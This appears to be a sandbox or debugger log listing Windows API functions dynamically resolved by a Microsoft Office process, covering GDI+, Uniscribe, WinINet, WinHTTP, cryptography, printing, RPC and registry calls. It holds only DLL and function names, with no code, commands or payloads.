DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: USP10.DLL/ScriptItemizeOpenType
DynamicLoader: USP10.DLL/ScriptShapeOpenType
DynamicLoader: USP10.DLL/ScriptPlaceOpenType
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: GdiPlus.dll/GdipAddPathRectangle
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: GdiPlus.dll/GdipSetSolidFillColor
DynamicLoader: mso.dll/
DynamicLoader: GdiPlus.dll/GdipGetPointCount
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: GdiPlus.dll/GdipGetVisibleClipBoundsI
DynamicLoader: mso.dll/
DynamicLoader: GdiPlus.dll/GdipCreateMatrix
DynamicLoader: mso.dll/
DynamicLoader: GdiPlus.dll/GdipSetMatrixElements
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: GdiPlus.dll/GdipSetTextRenderingHint
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: GdiPlus.dll/GdipSetWorldTransform
DynamicLoader: mso.dll/
DynamicLoader: GdiPlus.dll/GdipGetWorldTransform
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: GdiPlus.dll/GdipGetInterpolationMode
DynamicLoader: mso.dll/
DynamicLoader: GdiPlus.dll/GdipResetWorldTransform
DynamicLoader: mso.dll/
DynamicLoader: GdiPlus.dll/GdipCreateRegion
DynamicLoader: mso.dll/
DynamicLoader: GdiPlus.dll/GdipGetClip
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: GdiPlus.dll/GdipSetClipRegion
DynamicLoader: mso.dll/
DynamicLoader: GdiPlus.dll/GdipDeleteRegion
DynamicLoader: mso.dll/
DynamicLoader: GdiPlus.dll/GdipSetClipRectI
DynamicLoader: mso.dll/
DynamicLoader: USP10.DLL/ScriptItemize
DynamicLoader: USP10.DLL/ScriptPlace
DynamicLoader: USP10.DLL/ScriptShape
DynamicLoader: USP10.DLL/ScriptItemizeOpenType
DynamicLoader: USP10.DLL/ScriptPlaceOpenType
DynamicLoader: USP10.DLL/ScriptShapeOpenType
DynamicLoader: USP10.DLL/ScriptJustify
DynamicLoader: USP10.DLL/ScriptTextOut
DynamicLoader: USP10.DLL/ScriptCPtoX
DynamicLoader: USP10.DLL/ScriptXtoCP
DynamicLoader: USP10.DLL/ScriptFreeCache
DynamicLoader: USP10.DLL/ScriptCacheGetHeight
DynamicLoader: USP10.DLL/ScriptGetCMap
DynamicLoader: USP10.DLL/ScriptLayout
DynamicLoader: USP10.DLL/ScriptBreak
DynamicLoader: USP10.DLL/ScriptIsComplex
DynamicLoader: USP10.DLL/ScriptGetFontFeatureTags
DynamicLoader: USP10.DLL/ScriptGetFontScriptTags
DynamicLoader: USP10.DLL/ScriptGetFontLanguageTags
DynamicLoader: USP10.DLL/ScriptGetLogicalWidths
DynamicLoader: USP10.DLL/ScriptApplyLogicalWidth
DynamicLoader: USP10.DLL/ScriptGetGlyphABCWidth
DynamicLoader: USP10.DLL/ScriptCacheGetHeight
DynamicLoader: USP10.DLL/ScriptGetGlyphABCWidth
DynamicLoader: USP10.DLL/ScriptGetFontProperties
DynamicLoader: USP10.DLL/ScriptApplyDigitSubstitution
DynamicLoader: USP10.DLL/ScriptRecordDigitSubstitution
DynamicLoader: USP10.DLL/ScriptGetProperties
DynamicLoader: USP10.DLL/ScriptGetFontAlternateGlyphs
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: GdiPlus.dll/GdipGetRegionHRgn
DynamicLoader: mso.dll/
DynamicLoader: GdiPlus.dll/GdipGetDC
DynamicLoader: mso.dll/
DynamicLoader: GdiPlus.dll/GdipGetMatrixElements
DynamicLoader: mso.dll/
DynamicLoader: GDI32.dll/GdiIsMetaPrintDC
DynamicLoader: mso.dll/
DynamicLoader: GdiPlus.dll/GdipReleaseDC
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: GdiPlus.dll/GdipDeleteBrush
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: kernel32.dll/HeapSetInformation
DynamicLoader: msproof7.dll/DllGetClassObject
DynamicLoader: msproof7.dll/DllCanUnloadNow
DynamicLoader: ADVAPI32.dll/EventWrite
DynamicLoader: ADVAPI32.dll/EventRegister
DynamicLoader: ADVAPI32.dll/EventUnregister
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: ole32.dll/CoCreateInstance
DynamicLoader: ADVAPI32.dll/NotifyServiceStatusChangeW
DynamicLoader: MSPTLS.DLL/
DynamicLoader: MSPTLS.DLL/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: kernel32.dll/FlsAlloc
DynamicLoader: kernel32.dll/FlsGetValue
DynamicLoader: kernel32.dll/FlsSetValue
DynamicLoader: kernel32.dll/FlsFree
DynamicLoader: kernel32.dll/InitializeCriticalSectionAndSpinCount
DynamicLoader: kernel32.dll/IsProcessorFeaturePresent
DynamicLoader: MSGR3EN.DLL/CheckVersion
DynamicLoader: MSGR3EN.DLL/
DynamicLoader: MSGR3EN.DLL/
DynamicLoader: MSGR3EN.DLL/
DynamicLoader: MSGR3EN.DLL/
DynamicLoader: MSGR3EN.DLL/
DynamicLoader: MSGR3EN.DLL/
DynamicLoader: MSGR3EN.DLL/
DynamicLoader: MSGR3EN.DLL/
DynamicLoader: MSGR3EN.DLL/
DynamicLoader: MSGR3EN.DLL/
DynamicLoader: MSGR3EN.DLL/
DynamicLoader: MSGR3EN.DLL/
DynamicLoader: MSGR3EN.DLL/
DynamicLoader: MSGR3EN.DLL/
DynamicLoader: MSGR3EN.DLL/
DynamicLoader: MSGR3EN.DLL/
DynamicLoader: MSGR3EN.DLL/
DynamicLoader: MSGR3EN.DLL/
DynamicLoader: MSGR3EN.DLL/
DynamicLoader: MSGR3EN.DLL/
DynamicLoader: MSGR3EN.DLL/
DynamicLoader: MSGR3EN.DLL/
DynamicLoader: MSGR3EN.DLL/
DynamicLoader: MSGR3EN.DLL/
DynamicLoader: MSGR3EN.DLL/
DynamicLoader: MSGR3EN.DLL/
DynamicLoader: MSGR3EN.DLL/
DynamicLoader: MSGR3EN.DLL/
DynamicLoader: MSGR3EN.DLL/
DynamicLoader: ADVAPI32.dll/NotifyServiceStatusChangeW
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: riched20.dll/REMSOHInst
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: RPCRT4.dll/NdrClientCall2
DynamicLoader: RPCRT4.dll/RpcStringBindingComposeW
DynamicLoader: RPCRT4.dll/RpcBindingFromStringBindingW
DynamicLoader: RPCRT4.dll/RpcBindingSetAuthInfoExW
DynamicLoader: RPCRT4.dll/RpcStringFreeW
DynamicLoader: RPCRT4.dll/RpcBindingFree
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: RPCRT4.dll/RpcMgmtIsServerListening
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: Winspool.DRV/StartDocDlgW
DynamicLoader: Winspool.DRV/OpenPrinterW
DynamicLoader: Winspool.DRV/ResetPrinterW
DynamicLoader: Winspool.DRV/ClosePrinter
DynamicLoader: Winspool.DRV/GetPrinterW
DynamicLoader: Winspool.DRV/GetPrinterDriverW
DynamicLoader: Winspool.DRV/EndDocPrinter
DynamicLoader: Winspool.DRV/EndPagePrinter
DynamicLoader: Winspool.DRV/ReadPrinter
DynamicLoader: Winspool.DRV/StartDocPrinterW
DynamicLoader: Winspool.DRV/StartPagePrinter
DynamicLoader: Winspool.DRV/AbortPrinter
DynamicLoader: Winspool.DRV/DocumentEvent
DynamicLoader: Winspool.DRV/QuerySpoolMode
DynamicLoader: Winspool.DRV/QueryRemoteFonts
DynamicLoader: Winspool.DRV/SeekPrinter
DynamicLoader: Winspool.DRV/QueryColorProfile
DynamicLoader: Winspool.DRV/SplDriverUnloadComplete
DynamicLoader: Winspool.DRV/DocumentPropertiesW
DynamicLoader: Winspool.DRV/
DynamicLoader: Winspool.DRV/IsValidDevmodeW
DynamicLoader: Winspool.DRV/GetSpoolFileHandle
DynamicLoader: Winspool.DRV/CommitSpoolData
DynamicLoader: Winspool.DRV/CloseSpoolFileHandle
DynamicLoader: Winspool.DRV/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: CRYPTSP.dll/CryptAcquireContextA
DynamicLoader: CRYPTSP.dll/CryptGenKey
DynamicLoader: CRYPTSP.dll/CryptImportKey
DynamicLoader: CRYPTSP.dll/CryptExportKey
DynamicLoader: CRYPTSP.dll/CryptDestroyKey
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: GdiPlus.dll/GdipAlloc
DynamicLoader: mso.dll/
DynamicLoader: GdiPlus.dll/GdipCreateLineBrushI
DynamicLoader: mso.dll/
DynamicLoader: GdiPlus.dll/GdipFillRectangleI
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: GdiPlus.dll/GdipFree
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: GdiPlus.dll/GdipDrawRectangleI
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: CRYPTSP.dll/CryptCreateHash
DynamicLoader: CRYPTSP.dll/CryptSetHashParam
DynamicLoader: CRYPTSP.dll/CryptHashData
DynamicLoader: CRYPTSP.dll/CryptGetHashParam
DynamicLoader: CRYPTSP.dll/CryptDestroyHash
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: riched20.dll/REExtendedRegisterClass
DynamicLoader: UxTheme.DLL/IsThemeActive
DynamicLoader: IMM32.DLL/ImmAssociateContext
DynamicLoader: USER32.dll/NotifyWinEvent
DynamicLoader: ole32.dll/OleInitialize
DynamicLoader: ole32.dll/OleUninitialize
DynamicLoader: ole32.dll/CoCreateInstance
DynamicLoader: mso.dll/
DynamicLoader: WININET.dll/InternetCloseHandle
DynamicLoader: WININET.dll/InternetWriteFile
DynamicLoader: WININET.dll/InternetOpenA
DynamicLoader: WININET.dll/InternetOpenW
DynamicLoader: WININET.dll/InternetConnectA
DynamicLoader: WININET.dll/InternetConnectW
DynamicLoader: WININET.dll/FtpOpenFileA
DynamicLoader: WININET.dll/FtpGetFileA
DynamicLoader: WININET.dll/FtpSetCurrentDirectoryA
DynamicLoader: WININET.dll/FtpGetCurrentDirectoryA
DynamicLoader: WININET.dll/InternetFindNextFileA
DynamicLoader: WININET.dll/FtpFindFirstFileA
DynamicLoader: WININET.dll/InternetCombineUrlA
DynamicLoader: WININET.dll/InternetCanonicalizeUrlA
DynamicLoader: WININET.dll/InternetCanonicalizeUrlW
DynamicLoader: WININET.dll/FtpRenameFileA
DynamicLoader: WININET.dll/FtpDeleteFileA
DynamicLoader: WININET.dll/FtpCreateDirectoryA
DynamicLoader: WININET.dll/FtpRemoveDirectoryA
DynamicLoader: WININET.dll/InternetCrackUrlA
DynamicLoader: WININET.dll/InternetCrackUrlW
DynamicLoader: WININET.dll/InternetGetLastResponseInfoW
DynamicLoader: WININET.dll/InternetReadFile
DynamicLoader: WININET.dll/HttpOpenRequestW
DynamicLoader: WININET.dll/HttpOpenRequestA
DynamicLoader: WININET.dll/HttpSendRequestW
DynamicLoader: WININET.dll/HttpSendRequestA
DynamicLoader: WININET.dll/HttpQueryInfoW
DynamicLoader: WININET.dll/HttpQueryInfoA
DynamicLoader: WININET.dll/InternetGetCookieW
DynamicLoader: WININET.dll/InternetGetCookieExW
DynamicLoader: WININET.dll/InternetSetOptionW
DynamicLoader: WININET.dll/InternetSetOptionA
DynamicLoader: WININET.dll/CreateUrlCacheEntryW
DynamicLoader: WININET.dll/CreateUrlCacheEntryA
DynamicLoader: WININET.dll/CommitUrlCacheEntryW
DynamicLoader: WININET.dll/CommitUrlCacheEntryA
DynamicLoader: WININET.dll/GetUrlCacheEntryInfoW
DynamicLoader: WININET.dll/GetUrlCacheEntryInfoA
DynamicLoader: WININET.dll/FindFirstUrlCacheEntryExW
DynamicLoader: WININET.dll/FindFirstUrlCacheEntryExA
DynamicLoader: WININET.dll/FindNextUrlCacheEntryExW
DynamicLoader: WININET.dll/FindNextUrlCacheEntryExA
DynamicLoader: WININET.dll/FindFirstUrlCacheEntryA
DynamicLoader: WININET.dll/FindNextUrlCacheEntryA
DynamicLoader: WININET.dll/FindFirstUrlCacheEntryW
DynamicLoader: WININET.dll/FindNextUrlCacheEntryW
DynamicLoader: WININET.dll/FindCloseUrlCache
DynamicLoader: WININET.dll/SetUrlCacheEntryGroupW
DynamicLoader: WININET.dll/SetUrlCacheEntryGroup
DynamicLoader: WININET.dll/InternetQueryOptionW
DynamicLoader: WININET.dll/InternetQueryOptionA
DynamicLoader: WININET.dll/InternetOpenUrlW
DynamicLoader: WININET.dll/InternetOpenUrlA
DynamicLoader: WININET.dll/InternetGetConnectedState
DynamicLoader: WININET.dll/InternetAutodial
DynamicLoader: WININET.dll/InternetAutodialHangup
DynamicLoader: WININET.dll/InternetErrorDlg
DynamicLoader: WININET.dll/InternetGoOnline
DynamicLoader: WININET.dll/InternetGetConnectedStateExW
DynamicLoader: WININET.dll/HttpAddRequestHeadersW
DynamicLoader: WININET.dll/HttpAddRequestHeadersA
DynamicLoader: WININET.dll/InternetSetStatusCallbackW
DynamicLoader: WININET.dll/HttpSendRequestExW
DynamicLoader: WININET.dll/HttpEndRequestW
DynamicLoader: WININET.dll/InternetQueryDataAvailable
DynamicLoader: WININET.dll/InternetReadFileExA
DynamicLoader: WININET.dll/InternetAttemptConnect
DynamicLoader: WININET.dll/InternetCreateUrlA
DynamicLoader: WININET.dll/InternetCreateUrlW
DynamicLoader: RASAPI32.dll/RasConnectionNotificationW
DynamicLoader: sechost.dll/NotifyServiceStatusChangeA
DynamicLoader: CRYPTSP.dll/CryptAcquireContextW
DynamicLoader: OSPPCEXT.DLL/SLActivateProduct
DynamicLoader: OSPPCEXT.DLL/SLGetTokenActivationGrants
DynamicLoader: OSPPCEXT.DLL/SLGetTokenActivationCertificates
DynamicLoader: OSPPCEXT.DLL/SLGenerateTokenActivationChallenge
DynamicLoader: OSPPCEXT.DLL/SLSignTokenActivationChallenge
DynamicLoader: OSPPCEXT.DLL/SLDepositTokenActivationResponse
DynamicLoader: OSPPCEXT.DLL/SLFreeTokenActivationGrants
DynamicLoader: OSPPCEXT.DLL/SLFreeTokenActivationCertificates
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: SHLWAPI.dll/StrCmpNW
DynamicLoader: ole32.dll/CoInitializeEx
DynamicLoader: ADVAPI32.dll/RegDeleteTreeA
DynamicLoader: ADVAPI32.dll/RegDeleteTreeW
DynamicLoader: ole32.dll/CoTaskMemAlloc
DynamicLoader: ole32.dll/StringFromIID
DynamicLoader: NSI.dll/NsiAllocateAndGetTable
DynamicLoader: CFGMGR32.dll/CM_Open_Class_Key_ExW
DynamicLoader: iphlpapi.DLL/ConvertInterfaceGuidToLuid
DynamicLoader: iphlpapi.DLL/GetIfEntry2
DynamicLoader: iphlpapi.DLL/GetIpForwardTable2
DynamicLoader: iphlpapi.DLL/GetIpNetEntry2
DynamicLoader: iphlpapi.DLL/FreeMibTable
DynamicLoader: ole32.dll/CoTaskMemFree
DynamicLoader: NSI.dll/NsiFreeTable
DynamicLoader: ole32.dll/CoUninitialize
DynamicLoader: ws2_32.DLL/getaddrinfo
DynamicLoader: mso.dll/
DynamicLoader: ws2_32.DLL/
DynamicLoader: ws2_32.DLL/GetAddrInfoW
DynamicLoader: ws2_32.DLL/WSASocketW
DynamicLoader: ws2_32.DLL/
DynamicLoader: ws2_32.DLL/
DynamicLoader: ws2_32.DLL/
DynamicLoader: ws2_32.DLL/WSAIoctl
DynamicLoader: ws2_32.DLL/FreeAddrInfoW
DynamicLoader: ws2_32.DLL/
DynamicLoader: ws2_32.DLL/
DynamicLoader: ws2_32.DLL/WSARecv
DynamicLoader: ws2_32.DLL/WSASend
DynamicLoader: RPCRT4.dll/RpcBindingFree
DynamicLoader: ADVAPI32.dll/RegDeleteTreeA
DynamicLoader: ADVAPI32.dll/RegDeleteTreeW
DynamicLoader: schannel.dll/SpUserModeInitialize
DynamicLoader: ADVAPI32.dll/RegCreateKeyExW
DynamicLoader: ADVAPI32.dll/RegQueryValueExW
DynamicLoader: ADVAPI32.dll/RegQueryValueExW
DynamicLoader: ADVAPI32.dll/RegCloseKey
DynamicLoader: secur32.dll/FreeContextBuffer
DynamicLoader: ncrypt.dll/SslOpenProvider
DynamicLoader: ncrypt.dll/GetSChannelInterface
DynamicLoader: bcryptprimitives.dll/GetHashInterface
DynamicLoader: bcryptprimitives.dll/GetHashInterface
DynamicLoader: bcryptprimitives.dll/GetHashInterface
DynamicLoader: bcryptprimitives.dll/GetHashInterface
DynamicLoader: ncrypt.dll/SslIncrementProviderReferenceCount
DynamicLoader: ncrypt.dll/SslImportKey
DynamicLoader: bcryptprimitives.dll/GetCipherInterface
DynamicLoader: ncrypt.dll/SslLookupCipherSuiteInfo
DynamicLoader: USER32.dll/LoadStringW
DynamicLoader: ncrypt.dll/BCryptOpenAlgorithmProvider
DynamicLoader: bcryptprimitives.dll/GetHashInterface
DynamicLoader: ncrypt.dll/BCryptGetProperty
DynamicLoader: ncrypt.dll/BCryptCreateHash
DynamicLoader: ncrypt.dll/BCryptHashData
DynamicLoader: ncrypt.dll/BCryptFinishHash
DynamicLoader: ncrypt.dll/BCryptDestroyHash
DynamicLoader: CRYPT32.dll/CertGetCertificateChain
DynamicLoader: USERENV.dll/GetUserProfileDirectoryW
DynamicLoader: sechost.dll/ConvertSidToStringSidW
DynamicLoader: sechost.dll/ConvertStringSidToSidW
DynamicLoader: USERENV.dll/RegisterGPNotification
DynamicLoader: GPAPI.dll/RegisterGPNotificationInternal
DynamicLoader: sechost.dll/OpenSCManagerW
DynamicLoader: sechost.dll/OpenServiceW
DynamicLoader: sechost.dll/CloseServiceHandle
DynamicLoader: sechost.dll/QueryServiceConfigW
DynamicLoader: sechost.dll/ConvertSidToStringSidW
DynamicLoader: cryptnet.dll/CryptGetObjectUrl
DynamicLoader: cryptnet.dll/CryptGetObjectUrl
DynamicLoader: cryptnet.dll/CryptRetrieveObjectByUrlW
DynamicLoader: cryptnet.dll/I_CryptNetGetConnectivity
DynamicLoader: sensapi.dll/IsNetworkAlive
DynamicLoader: cryptnet.dll/CryptGetObjectUrl
DynamicLoader: cryptnet.dll/CryptGetObjectUrl
DynamicLoader: cryptnet.dll/CryptRetrieveObjectByUrlW
DynamicLoader: WINHTTP.dll/WinHttpOpen
DynamicLoader: WINHTTP.dll/WinHttpSetTimeouts
DynamicLoader: WINHTTP.dll/WinHttpSetOption
DynamicLoader: WINHTTP.dll/WinHttpCrackUrl
DynamicLoader: WINHTTP.dll/WinHttpConnect
DynamicLoader: WINHTTP.dll/WinHttpOpenRequest
DynamicLoader: WINHTTP.dll/WinHttpSetStatusCallback
DynamicLoader: WINHTTP.dll/WinHttpGetDefaultProxyConfiguration
DynamicLoader: WINHTTP.dll/WinHttpGetIEProxyConfigForCurrentUser
DynamicLoader: ADVAPI32.dll/RegDeleteTreeA
DynamicLoader: ADVAPI32.dll/RegDeleteTreeW
DynamicLoader: WINHTTP.dll/WinHttpGetProxyForUrl
DynamicLoader: ADVAPI32.dll/RegDeleteTreeA
DynamicLoader: ADVAPI32.dll/RegDeleteTreeW
DynamicLoader: WINHTTP.dll/WinHttpSendRequest
DynamicLoader: mso.dll/
DynamicLoader: WINHTTP.dll/WinHttpReceiveResponse
DynamicLoader: WINHTTP.dll/WinHttpQueryHeaders
DynamicLoader: WINHTTP.dll/WinHttpQueryDataAvailable
DynamicLoader: WINHTTP.dll/WinHttpReadData
DynamicLoader: WINHTTP.dll/WinHttpCloseHandle
DynamicLoader: bcryptprimitives.dll/GetAsymmetricEncryptionInterface
DynamicLoader: ncrypt.dll/BCryptImportKeyPair
DynamicLoader: ncrypt.dll/BCryptVerifySignature
DynamicLoader: bcryptprimitives.dll/GetHashInterface
DynamicLoader: ncrypt.dll/BCryptDestroyKey
DynamicLoader: cryptnet.dll/CryptRetrieveObjectByUrlW
DynamicLoader: SETUPAPI.dll/SetupIterateCabinetW
DynamicLoader: kernel32.dll/RegOpenKeyExW
DynamicLoader: kernel32.dll/RegCloseKey
DynamicLoader: Cabinet.dll/
DynamicLoader: Cabinet.dll/
DynamicLoader: DEVRTL.dll/DevRtlGetThreadLogToken
DynamicLoader: CRYPTSP.dll/CryptAcquireContextA
DynamicLoader: bcryptprimitives.dll/GetHashInterface
DynamicLoader: CRYPTSP.dll/CryptCreateHash
DynamicLoader: CRYPTSP.dll/CryptSetHashParam
DynamicLoader: CRYPTSP.dll/CryptVerifySignatureA
DynamicLoader: CRYPTSP.dll/CryptDestroyKey
DynamicLoader: CRYPTSP.dll/CryptDestroyHash
DynamicLoader: CRYPTSP.dll/CryptHashData
DynamicLoader: sechost.dll/OpenSCManagerW
DynamicLoader: sechost.dll/OpenServiceW
DynamicLoader: sechost.dll/QueryServiceConfigA
DynamicLoader: sechost.dll/QueryServiceStatus
DynamicLoader: sechost.dll/CloseServiceHandle
DynamicLoader: RPCRT4.dll/RpcStringBindingComposeA
DynamicLoader: RPCRT4.dll/RpcBindingFromStringBindingA
DynamicLoader: RPCRT4.dll/RpcEpResolveBinding
DynamicLoader: sechost.dll/LookupAccountSidLocalW
DynamicLoader: RPCRT4.dll/RpcBindingSetAuthInfoExW
DynamicLoader: RPCRT4.dll/RpcStringFreeA
DynamicLoader: RPCRT4.dll/NdrClientCall2
DynamicLoader: RPCRT4.dll/RpcBindingFree
DynamicLoader: cryptnet.dll/CryptGetObjectUrl
DynamicLoader: cryptnet.dll/CryptGetObjectUrl
DynamicLoader: cryptnet.dll/CryptRetrieveObjectByUrlW
DynamicLoader: bcryptprimitives.dll/GetHashInterface
DynamicLoader: cryptnet.dll/CryptRetrieveObjectByUrlW
DynamicLoader: SETUPAPI.dll/SetupIterateCabinetW
DynamicLoader: cryptnet.dll/CryptRetrieveObjectByUrlW
DynamicLoader: ADVAPI32.dll/RegDeleteTreeA
DynamicLoader: ADVAPI32.dll/RegDeleteTreeW
DynamicLoader: WINHTTP.dll/WinHttpTimeFromSystemTime
DynamicLoader: ADVAPI32.dll/RegDeleteTreeA
DynamicLoader: ADVAPI32.dll/RegDeleteTreeW
DynamicLoader: SHLWAPI.dll/StrStrIW
DynamicLoader: cryptnet.dll/I_CryptNetSetUrlCacheFlushInfo
DynamicLoader: SETUPAPI.dll/SetupIterateCabinetW
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: cryptnet.dll/I_CryptNetSetUrlCachePreFetchInfo
DynamicLoader: cryptnet.dll/CryptGetObjectUrl
DynamicLoader: cryptnet.dll/CryptGetObjectUrl
DynamicLoader: cryptnet.dll/CryptRetrieveObjectByUrlW
DynamicLoader: bcryptprimitives.dll/GetHashInterface
DynamicLoader: bcryptprimitives.dll/GetHashInterface
DynamicLoader: bcryptprimitives.dll/GetHashInterface
DynamicLoader: CRYPT32.dll/CertVerifyCertificateChainPolicy
DynamicLoader: CRYPT32.dll/CertFreeCertificateChain
DynamicLoader: CRYPT32.dll/CertDuplicateCertificateContext
DynamicLoader: ncrypt.dll/SslEncryptPacket
DynamicLoader: ncrypt.dll/SslDecryptPacket
DynamicLoader: CRYPT32.dll/CertFreeCertificateContext
DynamicLoader: CRYPTBASE.dll/SystemFunction036
DynamicLoader: ole32.dll/CoCreateInstance
DynamicLoader: shell32.dll/
DynamicLoader: ole32.dll/CoGetApartmentType
DynamicLoader: ole32.dll/CoRegisterInitializeSpy
DynamicLoader: ole32.dll/CoTaskMemFree
DynamicLoader: comctl32.dll/
DynamicLoader: OLEAUT32.dll/
DynamicLoader: ole32.dll/CoTaskMemAlloc
DynamicLoader: ole32.dll/CoGetMalloc
DynamicLoader: ole32.dll/CoInitializeEx
DynamicLoader: ole32.dll/CreateBindCtx
DynamicLoader: ole32.dll/CoTaskMemAlloc
DynamicLoader: comctl32.dll/
DynamicLoader: comctl32.dll/
DynamicLoader: comctl32.dll/
DynamicLoader: ADVAPI32.dll/RegEnumKeyW
DynamicLoader: SETUPAPI.dll/CM_Get_Device_Interface_List_Size_ExW
DynamicLoader: OLEAUT32.dll/
DynamicLoader: SETUPAPI.dll/CM_Get_Device_Interface_List_ExW
DynamicLoader: ADVAPI32.dll/InitializeSecurityDescriptor
DynamicLoader: ADVAPI32.dll/SetEntriesInAclW
DynamicLoader: ntmarta.dll/GetMartaExtensionInterface
DynamicLoader: comctl32.dll/
DynamicLoader: ADVAPI32.dll/SetSecurityDescriptorDacl
DynamicLoader: ADVAPI32.dll/IsTextUnicode
DynamicLoader: comctl32.dll/
DynamicLoader: comctl32.dll/
DynamicLoader: comctl32.dll/
DynamicLoader: shell32.dll/
DynamicLoader: ole32.dll/CoUninitialize
DynamicLoader: ole32.dll/CoGetMalloc
DynamicLoader: ole32.dll/CoTaskMemFree
DynamicLoader: comctl32.dll/
DynamicLoader: comctl32.dll/
DynamicLoader: comctl32.dll/
DynamicLoader: comctl32.dll/
DynamicLoader: comctl32.dll/
DynamicLoader: ntdll.dll/RtlDllShutdownInProgress
DynamicLoader: propsys.dll/PSCreateMemoryPropertyStore
DynamicLoader: sechost.dll/ConvertSidToStringSidW
DynamicLoader: profapi.dll/
DynamicLoader: LINKINFO.dll/CreateLinkInfoW
DynamicLoader: USER32.dll/IsCharAlphaW
DynamicLoader: USER32.dll/CharPrevW
DynamicLoader: ntshrui.dll/GetNetResourceFromLocalPathW
DynamicLoader: srvcli.dll/NetShareEnum
DynamicLoader: cscapi.dll/CscNetApiGetInterface
DynamicLoader: slc.dll/SLGetWindowsInformationDWORD
DynamicLoader: SHLWAPI.dll/PathRemoveFileSpecW
DynamicLoader: LINKINFO.dll/DestroyLinkInfo
DynamicLoader: propsys.dll/PropVariantToBoolean
DynamicLoader: ole32.dll/PropVariantClear
DynamicLoader: CRYPTSP.dll/CryptAcquireContextW
DynamicLoader: CRYPTSP.dll/CryptGenRandom
DynamicLoader: CRYPTSP.dll/CryptReleaseContext
DynamicLoader: ole32.dll/CoRevokeInitializeSpy
DynamicLoader: comctl32.dll/
DynamicLoader: OLEAUT32.dll/
DynamicLoader: ADVAPI32.dll/RegOpenKeyExW
DynamicLoader: ADVAPI32.dll/RegQueryInfoKeyW
DynamicLoader: ADVAPI32.dll/RegEnumKeyExW
DynamicLoader: ADVAPI32.dll/RegEnumValueW
DynamicLoader: ADVAPI32.dll/RegCloseKey
DynamicLoader: ADVAPI32.dll/RegQueryValueExW
DynamicLoader: ADVAPI32.dll/RegQueryValueExW
